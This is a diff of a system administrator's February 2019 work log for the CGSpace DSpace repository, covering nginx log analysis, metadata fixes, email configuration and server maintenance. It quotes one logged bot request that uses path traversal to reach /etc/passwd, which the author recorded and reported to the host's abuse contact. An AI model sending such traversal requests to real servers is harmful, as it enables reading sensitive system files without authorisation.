<li>This user was making requests to <code>/browse</code>, which is not currently under the existing rate limiting of dynamic pages in our nginx config
@ -280,14 +280,14 @@ sys 0m1.979s
<ul>
<li>Generate a list of CTA subjects from CGSpace for Peter:</li>
</ul>
<pre><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=124 GROUP BY text_value ORDER BY COUNT DESC) to /tmp/cta-subjects.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=124 GROUP BY text_value ORDER BY COUNT DESC) to /tmp/cta-subjects.csv with csv header;
COPY 321
</code></pre><ul>
<li>Skype with Michael Victor about CKM and CGSpace</li>
<li>Discuss the new IITA research theme field with Abenet and decide that we should use <code>cg.identifier.iitatheme</code></li>
<li>This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
589 2a01:4f8:140:3192::2
762 66.249.66.219
889 35.237.175.180
@ -307,7 +307,7 @@ COPY 321
<li>Peter sent me corrections and deletions for the CTA subjects and as usual, there were encoding errors with some accentsÁ in his file</li>
<li>In other news, it seems that the GREL syntax regarding booleans changed in OpenRefine recently, so I need to update some expressions like the one I use to detect encoding errors to use <code>toString()</code>:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -318,17 +318,17 @@ COPY 321
</code></pre><ul>
<li>Testing the corrections for sixty-five items and sixteen deletions using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> and <a href="https://gist.github.com/alanorth/bd7d58c947f686401a2b1fadc78736be">delete-metadata-values.py</a> scripts:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>I applied them on DSpace Test and CGSpace and started a full Discovery re-index:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Peter had marked several terms with <code>||</code> to indicate multiple values in his corrections so I will have to go back and do those manually:</li>
</ul>
<pre><code>EMPODERAMENTO DE JOVENS,EMPODERAMENTO||JOVENS
<pre tabindex="0"><code>EMPODERAMENTO DE JOVENS,EMPODERAMENTO||JOVENS
ENVIRONMENTAL PROTECTION AND NATURAL RESOURCES MANAGEMENT,NATURAL RESOURCES MANAGEMENT||ENVIRONMENT
FISHERIES AND AQUACULTURE,FISHERIES||AQUACULTURE
MARKETING AND TRADE,MARKETING||TRADE
@ -340,21 +340,21 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<ul>
<li>I dumped the CTA community so I can try to fix the subjects with multiple subjects that Peter indicated in his corrections:</li>
</ul>
<pre><code>$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
</code></pre><ul>
<li>Then I used <code>csvcut</code> to get only the CTA subject columns:</li>
</ul>
<pre><code>$ csvcut -c &quot;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&quot; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
<pre tabindex="0"><code>$ csvcut -c &#34;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&#34; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
</code></pre><ul>
<li>After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values</li>
<li>Then I imported it back into CGSpace:</li>
</ul>
<pre><code>$ dspace metadata-import -f /tmp/2019-02-06-CTA-multiple-subjects.csv
<pre tabindex="0"><code>$ dspace metadata-import -f /tmp/2019-02-06-CTA-multiple-subjects.csv
</code></pre><ul>
<li>Another day, another alert about high load on CGSpace (linode18) from Linode</li>
<li>This time the load average was 370% and the top ten IPs before, during, and after that time were:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
689 35.237.175.180
1236 5.9.6.51
1305 34.218.226.147
@ -368,7 +368,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Looking closer at the top users, I see <code>45.5.186.2</code> is in Brazil and was making over 100 requests per minute to the REST API:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E &#39;06/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
118 06/Feb/2019:05:46
119 06/Feb/2019:05:37
119 06/Feb/2019:05:47
@ -382,7 +382,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;06/Feb/2019&#39; | grep 45.5.186.2 | awk &#39;{print $9}&#39; | sort | uniq -c
10411 200
1 301
7 302
@ -392,7 +392,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
328 220.247.212.35
372 66.249.66.221
380 207.46.13.2
@ -403,7 +403,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
1236 5.9.6.51
1554 66.249.66.219
4942 85.25.237.71
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
10 66.249.66.221
26 66.249.66.219
69 5.143.231.8
@ -419,7 +419,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Linode sent an alert last night that the load on CGSpace (linode18) was over 300%</li>
<li>Here are the top IPs in the web server and API logs before, during, and after that time, respectively:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.209
6 2a01:4f8:210:51ef::2
6 40.77.167.75
@ -430,7 +430,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
20 95.108.181.88
27 66.249.66.219
2381 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
455 45.5.186.2
506 40.77.167.75
559 54.70.40.11
@ -444,7 +444,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Then again this morning another alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.223
8 104.198.9.108
13 110.54.160.222
@ -455,7 +455,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
4529 45.5.186.2
4661 205.186.128.185
4661 70.32.83.92
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
145 157.55.39.237
154 66.249.66.221
214 34.218.226.147
@ -471,7 +471,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>I could probably rate limit the REST API, or maybe just keep increasing the alert threshold so I don&rsquo;t get alert spam (this is probably the correct approach because it seems like the REST API can keep up with the requests and is returning HTTP 200 status as far as I can tell)</li>
<li>Bosede from IITA sent a message that a colleague is having problems submitting to some collections in their community:</li>
</ul>
<pre><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1056 by user 1759
<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1056 by user 1759
</code></pre><ul>
<li>Collection 1056 appears to be <a href="https://cgspace.cgiar.org/handle/10568/68741">IITA Posters and Presentations</a> and I see that its workflow step 1 (Accept/Reject) is empty:</li>
</ul>
@ -482,7 +482,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Bizuwork asked about the &ldquo;DSpace Submission Approved and Archived&rdquo; emails that stopped working last month</li>
<li>I tried the <code>test-email</code> command on DSpace and it indeed is not working:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: aorth@mjanja.ch
@ -503,7 +503,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>I re-configured CGSpace to use the email/password for cgspace-support, but I get this error when I try the <code>test-email</code> script:</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR10CA0028.EURPRD10.PROD.OUTLOOK.COM]
</code></pre><ul>
<li>I tried to log into Outlook 365 with the credentials but I think the ones I have must be wrong, so I will ask ICT to reset the password</li>
@ -513,7 +513,7 @@ Please see the DSpace documentation for assistance.
<li>Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!</li>
<li>This is just for this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
289 35.237.175.180
290 66.249.66.221
296 18.195.78.144
@ -524,7 +524,7 @@ Please see the DSpace documentation for assistance.
742 5.143.231.38
1046 5.9.6.51
1331 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
4 66.249.83.30
5 49.149.10.16
8 207.46.13.64
@ -539,7 +539,7 @@ Please see the DSpace documentation for assistance.
<li>I know 66.249.66.219 is Google, 5.9.6.51 is MegaIndex, and 5.143.231.38 is SputnikBot</li>
<li>Ooh, but 151.80.203.180 is some malicious bot making requests for <code>/etc/passwd</code> like this:</li>
</ul>
<pre><code>/bitstream/handle/10568/68981/Identifying%20benefit%20flows%20studies%20on%20the%20potential%20monetary%20and%20non%20monetary%20benefits%20arising%20from%20the%20International%20Treaty%20on%20Plant%20Genetic_1671.pdf?sequence=1&amp;amp;isAllowed=../etc/passwd
<pre tabindex="0"><code>/bitstream/handle/10568/68981/Identifying%20benefit%20flows%20studies%20on%20the%20potential%20monetary%20and%20non%20monetary%20benefits%20arising%20from%20the%20International%20Treaty%20on%20Plant%20Genetic_1671.pdf?sequence=1&amp;amp;isAllowed=../etc/passwd
</code></pre><ul>
<li>151.80.203.180 is on OVH so I sent a message to their abuse email&hellip;</li>
</ul>
@ -547,7 +547,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
232 18.195.78.144
238 35.237.175.180
281 66.249.66.221
@ -558,7 +558,7 @@ Please see the DSpace documentation for assistance.
444 2a01:4f8:140:3192::2
1171 5.9.6.51
1196 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
6 112.203.241.69
7 157.55.39.149
9 40.77.167.178
@ -572,16 +572,16 @@ Please see the DSpace documentation for assistance.
</code></pre><ul>
<li>Another interesting thing might be the total number of requests for web and API services during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
16333
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
15964
</code></pre><ul>
<li>Also, the number of unique IPs served during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1622
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
95
</code></pre><ul>
<li>It&rsquo;s very clear to me now that the API requests are the heaviest!</li>
@ -610,7 +610,7 @@ Please see the DSpace documentation for assistance.
</ul>
</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: cannot test email because mail.server.disabled is set to true
</code></pre><ul>
<li>I&rsquo;m not sure why I didn&rsquo;t know about this configuration option before, and always maintained multiple configurations for development and production
@ -620,7 +620,7 @@ Please see the DSpace documentation for assistance.
</li>
<li>I updated my local Sonatype nexus Docker image and had an issue with the volume for some reason so I decided to just start from scratch:</li>
</ul>
<pre><code># docker rm nexus
<pre tabindex="0"><code># docker rm nexus
# docker pull sonatype/nexus3
# mkdir -p /home/aorth/.local/lib/containers/volumes/nexus_data
# chown 200:200 /home/aorth/.local/lib/containers/volumes/nexus_data
@ -628,7 +628,7 @@ Please see the DSpace documentation for assistance.
</code></pre><ul>
<li>For some reason my <code>mvn package</code> for DSpace is not working now&hellip; I might go back to <a href="https://mjanja.ch/2018/02/cache-maven-artifacts-with-artifactory/">using Artifactory for caching</a> instead:</li>
</ul>
<pre><code># docker pull docker.bintray.io/jfrog/artifactory-oss:latest
<pre tabindex="0"><code># docker pull docker.bintray.io/jfrog/artifactory-oss:latest
# mkdir -p /home/aorth/.local/lib/containers/volumes/artifactory5_data
# chown 1030 /home/aorth/.local/lib/containers/volumes/artifactory5_data
# docker run --name artifactory --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
@ -643,13 +643,13 @@ Please see the DSpace documentation for assistance.
<li>On a similar note, I wonder if we could use the performance-focused <a href="https://libvips.github.io/libvips/">libvps</a> and the third-party <a href="https://github.com/codecitizen/jlibvips/">jlibvips Java library</a> in DSpace</li>
<li>Testing the <code>vipsthumbnail</code> command line tool with <a href="https://cgspace.cgiar.org/handle/10568/51999">this CGSpace item that uses CMYK</a>:</li>
</ul>
<pre><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o &#39;%s.jpg[Q=92,optimize_coding,strip]&#39;
</code></pre><ul>
<li>(DSpace 5 appears to use JPEG 92 quality so I do the same)</li>
<li>Thinking about making &ldquo;top items&rdquo; endpoints in my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
<li>I could use the following SQL queries very easily to get the top items by views or downloads:</li>
</ul>
<pre><code>dspacestatistics=# SELECT * FROM items WHERE views &gt; 0 ORDER BY views DESC LIMIT 10;
<pre tabindex="0"><code>dspacestatistics=# SELECT * FROM items WHERE views &gt; 0 ORDER BY views DESC LIMIT 10;
dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads DESC LIMIT 10;
</code></pre><ul>
<li>I&rsquo;d have to think about what to make the REST API endpoints, perhaps: <code>/statistics/top/items?limit=10</code></li>
@ -660,7 +660,7 @@ dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads
</ul>
</li>
</ul>
<pre><code>$ identify -verbose alc_contrastes_desafios.pdf.jpg
<pre tabindex="0"><code>$ identify -verbose alc_contrastes_desafios.pdf.jpg
...
Colorspace: sRGB
</code></pre><ul>
@ -671,35 +671,35 @@ dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads
<li>ILRI ICT reset the password for the CGSpace mail account, but I still can&rsquo;t get it to send mail from DSpace&rsquo;s <code>test-email</code> utility</li>
<li>I even added extra mail properties to <code>dspace.cfg</code> as suggested by someone on the dspace-tech mailing list:</li>
</ul>
<pre><code>mail.extraproperties = mail.smtp.starttls.required = true, mail.smtp.auth=true
<pre tabindex="0"><code>mail.extraproperties = mail.smtp.starttls.required = true, mail.smtp.auth=true
</code></pre><ul>
<li>But the result is still:</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR06CA0001.eurprd06.prod.outlook.com]
</code></pre><ul>
<li>I tried to log into the Outlook 365 web mail and it doesn&rsquo;t work so I&rsquo;ve emailed ILRI ICT again</li>
<li>After reading the <a href="https://javaee.github.io/javamail/FAQ#commonmistakes">common mistakes in the JavaMail FAQ</a> I reconfigured the extra properties in DSpace&rsquo;s mail configuration to be simply:</li>
</ul>
<pre><code>mail.extraproperties = mail.smtp.starttls.enable=true
<pre tabindex="0"><code>mail.extraproperties = mail.smtp.starttls.enable=true
</code></pre><ul>
<li>&hellip; and then I was able to send a mail using my personal account where I know the credentials work</li>
<li>The CGSpace account still gets this error message:</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: javax.mail.AuthenticationFailedException
</code></pre><ul>
<li>I updated the <a href="https://github.com/ilri/DSpace/pull/410">DSpace SMTP settings in <code>dspace.cfg</code></a> as well as the <a href="https://github.com/ilri/rmg-ansible-public/commit/ab5fe4d10e16413cd04ffb1bc3179dc970d6d47c">variables in the DSpace role of the Ansible infrastructure scripts</a></li>
<li>Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:</li>
</ul>
<pre><code>$ dspace user --delete --email blah@cta.int
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
<pre tabindex="0"><code>$ dspace user --delete --email blah@cta.int
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password &#39;blah&#39;
</code></pre><ul>
<li>On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable <code>webui.user.assumelogin = true</code></li>
<li>I will enable this on CGSpace (<a href="https://github.com/ilri/DSpace/pull/411">#411</a>)</li>
<li>Test re-creating my local PostgreSQL and Artifactory containers with podman instead of Docker (using the volumes from my old Docker containers though):</li>
</ul>
<pre><code># podman pull postgres:9.6-alpine
<pre tabindex="0"><code># podman pull postgres:9.6-alpine
# podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
# podman pull docker.bintray.io/jfrog/artifactory-oss
# podman run --name artifactory -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
@ -707,7 +707,7 @@ $ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int
<li>Totally works&hellip; awesome!</li>
<li>Then I tried with rootless containers by creating the subuid and subgid mappings for aorth:</li>
</ul>
<pre><code>$ sudo touch /etc/subuid /etc/subgid
<pre tabindex="0"><code>$ sudo touch /etc/subuid /etc/subgid
$ usermod --add-subuids 10000-75535 aorth
$ usermod --add-subgids 10000-75535 aorth
$ sudo sysctl kernel.unprivileged_userns_clone=1
@ -717,7 +717,7 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
<li>Which totally works, but Podman&rsquo;s rootless support doesn&rsquo;t work with port mappings yet&hellip;</li>
<li>Deploy the Tomcat-7-from-tarball branch on CGSpace (linode18), but first stop the Ubuntu Tomcat 7 and do some basic prep before running the Ansible playbook:</li>
</ul>
<pre><code># systemctl stop tomcat7
<pre tabindex="0"><code># systemctl stop tomcat7
# apt remove tomcat7 tomcat7-admin
# useradd -m -r -s /bin/bash dspace
# mv /usr/share/tomcat7/.m2 /home/dspace
@ -728,14 +728,14 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
</code></pre><ul>
<li>After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:</li>
</ul>
<pre><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
</code></pre><ul>
<li>The issue last month was address space, which is now set as <code>LimitAS=infinity</code> in <code>tomcat7.service</code>&hellip;</li>
<li>I re-ran the Ansible playbook to make sure all configs etc were the, then rebooted the server</li>
<li>Still the error persists after reboot</li>
<li>I will try to stop Tomcat and then remove the locks manually:</li>
</ul>
<pre><code># find /home/cgspace.cgiar.org/solr/ -iname &quot;write.lock&quot; -delete
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &#34;write.lock&#34; -delete
</code></pre><ul>
<li>After restarting Tomcat the usage statistics are back</li>
<li>Interestingly, many of the locks were from last month, last year, and even 2015! I&rsquo;m pretty sure that&rsquo;s not supposed to be how locks work&hellip;</li>
@ -747,19 +747,19 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
<ul>
<li>Tomcat was killed around 3AM by the kernel&rsquo;s OOM killer according to <code>dmesg</code>:</li>
</ul>
<pre><code>[Fri Feb 15 03:10:42 2019] Out of memory: Kill process 12027 (java) score 670 or sacrifice child
<pre tabindex="0"><code>[Fri Feb 15 03:10:42 2019] Out of memory: Kill process 12027 (java) score 670 or sacrifice child
[Fri Feb 15 03:10:42 2019] Killed process 12027 (java) total-vm:14108048kB, anon-rss:5450284kB, file-rss:0kB, shmem-rss:0kB
[Fri Feb 15 03:10:43 2019] oom_reaper: reaped process 12027 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
<li>The <code>tomcat7</code> service shows:</li>
</ul>
<pre><code>Feb 15 03:10:44 linode19 systemd[1]: tomcat7.service: Main process exited, code=killed, status=9/KILL
<pre tabindex="0"><code>Feb 15 03:10:44 linode19 systemd[1]: tomcat7.service: Main process exited, code=killed, status=9/KILL
</code></pre><ul>
<li>I suspect it was related to the media-filter cron job that runs at 3AM but I don&rsquo;t see anything particular in the log files</li>
<li>I want to try to normalize the <code>text_lang</code> values to make working with metadata easier</li>
<li>We currently have a bunch of weird values that DSpace uses like <code>NULL</code>, <code>en_US</code>, and <code>en</code> and others that have been entered manually by editors:</li>
</ul>
